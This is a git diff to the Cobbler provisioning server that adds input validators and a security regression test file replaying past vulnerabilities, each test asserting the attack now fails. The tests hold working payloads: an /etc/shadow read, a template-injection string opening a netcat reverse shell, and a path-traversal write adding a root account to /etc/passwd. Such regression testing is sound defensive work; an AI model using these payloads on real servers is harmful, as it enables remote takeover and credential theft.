71 changes: 71 additions & 0 deletions cobbler/validate.py
Original file line number Diff line number Diff line change
Expand Up @@ -22,14 +22,17 @@
from urllib.parse import urlparse
from ipaddress import AddressValueError, NetmaskValueError
from typing import Union
from uuid import UUID

import netaddr

from cobbler import enums, utils
from cobbler.items import item

RE_HOSTNAME = re.compile(r'^([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])(\.([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]{0,61}[a-zA-Z0-9]))*$')
RE_URL_GRUB = re.compile(r"^\((?P<protocol>http|tftp),(?P<server>.*)\)/(?P<path>.*)$")
RE_URL = re.compile(r'^[a-zA-Z\d-]{,63}(\.[a-zA-Z\d-]{,63})*$') # https://stackoverflow.com/a/2894918
RE_SCRIPT_NAME = re.compile(r"[a-zA-Z0-9_\-.]+")

# blacklist invalid values to the repo statement in autoinsts
AUTOINSTALL_REPO_BLACKLIST = ['enabled', 'gpgcheck', 'gpgkey']
Expand Down Expand Up @@ -606,3 +609,71 @@ def validate_grub_remote_file(value: str) -> bool:
success_path = urlparse("https://fake.local/%s" % path).path[1:] == path
success = (success_server_ip or success_server_name) and success_path
return success


def validate_autoinstall_script_name(name: str) -> bool:
"""
This validates if the name given for the script is valid in the context of the API call made. It will be handed to
tftpgen.py#generate_script in the end.
:param name: The name of the script. Will end up being a filename. May have an extension but should never be a path.
:return: If this is a valid script name or not.
"""
if not isinstance(name, str):
return False
if re.fullmatch(RE_SCRIPT_NAME, name):
return True
return False


def validate_uuid(possible_uuid: str) -> bool:
"""
Validate if the handed string is a valid UUIDv4.
:param possible_uuid: The str with the UUID.
:return: True in case it is one, False otherwise.
"""
if not isinstance(possible_uuid, str):
return False
# Taken from: https://stackoverflow.com/a/33245493/4730773
try:
uuid_obj = UUID(possible_uuid, version=4)
except ValueError:
return False
return str(uuid_obj) == possible_uuid


def validate_obj_type(object_type: str) -> bool:
"""
:param object_type:
:return:
"""
if not isinstance(object_type, str):
return False
return object_type in ["distro", "profile", "system", "repo", "image", "mgmtclass", "package", "file", "menu"]


def validate_obj_name(object_name: str) -> bool:
"""
:param object_name:
:return:
"""
if not isinstance(object_name, str):
return False
return bool(re.fullmatch(item.RE_OBJECT_NAME, object_name))


def validate_obj_id(object_id: str) -> bool:
"""
:param object_id:
:return: True in case it is one, False otherwise.
"""
if not isinstance(object_id, str):
return False
if object_id.startswith("___NEW___"):
object_id = object_id[9:]
(otype, oname) = object_id.split("::", 1)
return validate_obj_type(otype) and validate_obj_name(oname)
Empty file added tests/actions/__init__.py
Empty file.
1 change: 1 addition & 0 deletions tests/conftest.py
Original file line number Diff line number Diff line change
Expand Up @@ -54,6 +54,7 @@ def cleanup_leftover_items():
os.remove(json_file)
logger.info("Removed file: " + json_file)


@pytest.fixture(scope="function")
def fk_initrd():
"""
Expand Down
Empty file added tests/special_cases/__init__.py
Empty file.
112 changes: 112 additions & 0 deletions tests/special_cases/security_test.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,112 @@
"""
This test module tries to automatically replicate all security incidents we had in the past and checks if they fail.
"""
# SPDX-License-Identifier: GPL-2.0-or-later
import base64
import os
import xmlrpc.client

import pytest

from cobbler.utils import get_shared_secret


# ==================== Start tnpconsultants ====================

# SPDX-FileCopyrightText: 2021 Nicolas Chatelain <nicolas.chatelain@tnpconsultants.com>


@pytest.fixture
def try_connect():
def try_connect(url) -> xmlrpc.client.ServerProxy:
xmlrpc_server = xmlrpc.client.ServerProxy(url)
return xmlrpc_server
return try_connect


@pytest.fixture(autouse=True)
def setup_profile(try_connect, create_kernel_initrd, fk_kernel, fk_initrd):
cobbler_api = try_connect("http://localhost/cobbler_api")
shared_secret = get_shared_secret()
token = cobbler_api.login("", shared_secret)
folder = create_kernel_initrd(fk_kernel, fk_initrd)
kernel_path = os.path.join(folder, fk_kernel)
initrd_path = os.path.join(folder, fk_kernel)
# Create a test Distro
distro = cobbler_api.new_distro(token)
cobbler_api.modify_distro(distro, "name", "security_test_distro", token)
cobbler_api.modify_distro(distro, "arch", "x86_64", token)
cobbler_api.modify_distro(distro, "kernel", str(kernel_path), token)
cobbler_api.modify_distro(distro, "initrd", str(initrd_path), token)
cobbler_api.save_distro(distro, token)
# Create a test Profile
profile = cobbler_api.new_profile(token)
cobbler_api.modify_profile(profile, "name", "security_test_profile", token)
cobbler_api.modify_profile(profile, "distro", "security_test_distro", token)
cobbler_api.save_profile(profile, token)

yield

cobbler_api.remove_profile("security_test_profile", token)
cobbler_api.remove_distro("security_test_distro", token)


def test_arbitrary_file_disclosure_1(setup_profile, try_connect):
# Arrange
cobbler_api = try_connect("http://localhost/cobbler_api")

# Act
profiles = cobbler_api.get_profiles()
target = profiles[0]["name"]
try:
result = cobbler_api.generate_script(target, "", "/etc/shadow")

# Assert this NOT succeeds
assert not result.startswith("root")
except xmlrpc.client.Fault as e:
# We have no way of exactly knowing what is in there but if its a ValueError we most likely caught the exploit
# before something happened.
assert "ValueError" in e.faultString


def test_template_injection_1(setup_profile, try_connect):
# Arrange
exploitcode = '__import__(\'os\').system(\'nc [tnpitsecurity] 4242 -e /bin/sh\')'
cobbler_api = try_connect("http://localhost/cobbler_api")

# Act
profiles = cobbler_api.get_profiles()
target = profiles[0]["name"]
try:
print("[+] Stage 1 : Poisoning log with Cheetah template RCE")
result_stage_1 = cobbler_api.generate_script(target, "", '{<%= ' + exploitcode + ' %>}')
print("[+] Stage 2 : Rendering template using an arbitrary file read.")
result_stage_2 = cobbler_api.generate_script(target, "", "/var/log/cobbler/cobbler.log")

# Assert this NOT succeeds
assert not result_stage_1.startswith("__import__")
# We should never get to stage two
except xmlrpc.client.Fault as e:
# We have no way of exactly knowing what is in there but if its a ValueError we most likely caught the exploit
# before something happened.
assert "ValueError" in e.faultString


def test_arbitrary_file_write_1(setup_profile, try_connect):
# Arrange
cobbler_api = try_connect("http://localhost/cobbler_api")
exploit = b"cha:!:0:0:cha:/:/bin/bash\n"

# Act
result = cobbler_api.upload_log_data(
"../../../../../../etc",
"passwd",
len(exploit),
100000,
base64.b64encode(exploit)
)

# Assert this NOT succeeds
assert result is False

# ==================== END tnpconsultants ====================
15 changes: 14 additions & 1 deletion tests/xmlrpcapi/miscellaneous_test.py
Original file line number Diff line number Diff line change
Expand Up @@ -424,7 +424,7 @@ def test_modify_setting(self, remote, token):
result = remote.modify_setting("auth_token_expiration", 7200, token)

# Assert
assert result == 0
assert result == 1

def test_read_autoinstall_template(self, remote, token, create_autoinstall_template, remove_autoinstall_template):
# Arrange
Expand Down Expand Up @@ -562,3 +562,16 @@ def test_render_vars(self, remote, token):

# Assert --> Let the test pass if the call is okay.
assert True

@pytest.mark.skip("Functionality is broken!")
@pytest.mark.usefixtures("create_testdistro", "create_testmenu", "create_testprofile", "create_testsystem",
"remove_testdistro", "remove_testmenu", "remove_testprofile", "remove_testsystem")
def test_upload_log_data(self, remote):
# Arrange

# Act
result = remote.upload_log_data("testsystem0", "testinstall.log", 0, 0, b"asdas")

# Assert
assert isinstance(result, bool)
assert result